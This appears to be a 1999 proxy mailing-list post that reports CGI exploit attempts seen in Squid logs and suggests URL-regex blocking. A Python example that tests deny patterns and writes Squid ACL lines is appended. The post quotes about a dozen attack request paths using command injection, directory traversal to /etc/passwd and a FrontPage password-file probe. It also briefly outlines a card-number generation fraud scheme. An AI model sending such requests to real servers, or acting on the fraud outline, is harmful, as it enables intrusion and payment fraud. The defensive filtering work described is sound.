proxy scams and abuse

From: Andrew Daviel <andrew@dont-contact.us>
Date: Fri, 22 Jan 1999 00:36:39 -0800 (PST)

Recently, I seem to be getting more and more CGI exploit attempts. One
such came through a Squid at an educational institution. They reported
345 attempts to get /cgi-bin/aglimpse/80* .....

There seems to be a list somewhere of CGI exploits such as:

/cgi-bin/phf?Qname=me%0als%20-lFa
/cgi-bin/faxsurvey?ls%20-lFa
/cgi-bin/handler/useless_shit;ls%20-lFa%20/etc|?data=Download
/cgi-bin/webdist.cgi?distloc=;ls%20-lFa%20/etc/
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/view-source?../../../../../../../../etc/passwd
/cgi-bin/htmlscript?../../../../../../../../etc/passwd
/cgi-bin/campas?%0als%20-lFa%20/etc
/cgi-bin/info2www?`(../../../../../../../../ls%20-lFa%20/etc|)`
/cgi-bin/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo
/cgi-bin/pfdisplay.cgi?'%0Als%20-lFa%20/etc/'
/_vti_pvt/service.pwd HTTP/1.0"

I suggested to my correspondent that they might consider the URL regex
features in Squid 2 to block such attempts.

On a semi-related subject, I hear of schemes to generate sequences of
random credit-card numbers, filter them through a checksum generator, then
use them to attempt to buy time on sex sites. Such sites may not validate
expiry dates or check names, require any corroborating ID etc. and may
mail passwords to temporary or anonymous email addresses. Attempts may use
public proxies to obfuscate the trail...

cheers

Deniable unless digitally signed
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376
http://andrew.triumf.ca/andrew
Received on Fri Feb 05 1999 - 13:54:44 MST
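
The URL-regex blocking suggested in the message can be checked before it is deployed. The following is an added example, not part of the original post and not Squid's own code: it tests candidate deny patterns against the request paths quoted above and against constructed benign paths, then renders them as squid.conf lines. The pattern names, the ACL name cgi_probe and the benign paths are assumptions made for illustration, as is the premise that Squid matches urlpath_regex as POSIX extended regex against the path and query string as sent.

```python
import re

# Deny patterns use only syntax common to POSIX extended regex and Python's
# re (assumption: Squid compiles urlpath_regex patterns as POSIX ERE).
DENY_PATTERNS = {
    "encoded_newline": r"%0[ad]",
    "dir_traversal": r"\.\./\.\./",
    "shell_metachar": r"[;|`]",
    "passwd_file": r"/etc/passwd",
    "frontpage_pwd": r"/_vti_pvt/service\.pwd",
    "listed_script": r"/cgi-bin/(phf|faxsurvey|campas|aglimpse|info2www)",
}

# Request paths quoted in the post (log residue after the last one dropped).
REPORTED = [
    "/cgi-bin/phf?Qname=me%0als%20-lFa",
    "/cgi-bin/faxsurvey?ls%20-lFa",
    "/cgi-bin/handler/useless_shit;ls%20-lFa%20/etc|?data=Download",
    "/cgi-bin/webdist.cgi?distloc=;ls%20-lFa%20/etc/",
    "/cgi-bin/php.cgi?/etc/passwd",
    "/cgi-bin/view-source?../../../../../../../../etc/passwd",
    "/cgi-bin/htmlscript?../../../../../../../../etc/passwd",
    "/cgi-bin/campas?%0als%20-lFa%20/etc",
    "/cgi-bin/info2www?`(../../../../../../../../ls%20-lFa%20/etc|)`",
    "/cgi-bin/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo",
    "/cgi-bin/pfdisplay.cgi?'%0Als%20-lFa%20/etc/'",
    "/_vti_pvt/service.pwd",
]

# Constructed benign paths; ';' is also a legal query-string separator.
BENIGN = [
    "/cgi-bin/search?q=squid%20cache",
    "/docs/../images/logo.gif",
    "/cgi-bin/query?a=1;b=2",
]

def matched_rules(path):
    # Names of the deny patterns that hit this request path (case-insensitive).
    return [n for n, p in DENY_PATTERNS.items() if re.search(p, path, re.I)]

def missed(paths=REPORTED):
    return [p for p in paths if not matched_rules(p)]

def false_positives(paths=BENIGN):
    return [p for p in paths if matched_rules(p)]

def squid_acl_lines(acl="cgi_probe"):
    """Render the patterns as squid.conf lines (same-name acl lines are ORed)."""
    lines = [f"acl {acl} urlpath_regex -i {p}" for p in DENY_PATTERNS.values()]
    return lines + [f"http_access deny {acl}"]
```

missed() shows which reported probes no pattern catches, and false_positives() shows the cost of the broad shell_metachar rule, which also flags the legitimate ';'-separated query string.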
